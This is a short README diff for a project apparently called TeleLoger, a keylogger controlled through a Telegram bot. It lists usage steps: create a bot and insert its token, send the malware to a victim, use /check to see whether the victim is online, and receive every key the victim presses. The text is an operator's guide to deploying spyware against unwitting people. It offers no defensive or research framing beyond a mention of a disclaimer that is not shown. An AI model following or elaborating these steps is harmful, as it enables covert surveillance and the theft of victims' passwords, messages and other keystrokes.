KriperPlay/TeleLoger/README.md

 # How to use
 * Read disclaimer
+* Create TGBot and write bot token in var 'API_TOKEN'
 * Send your malware yout victim
 * Write /check to bot to know are online your victim
 * If victim in online, bot will send you all keys pressed your victim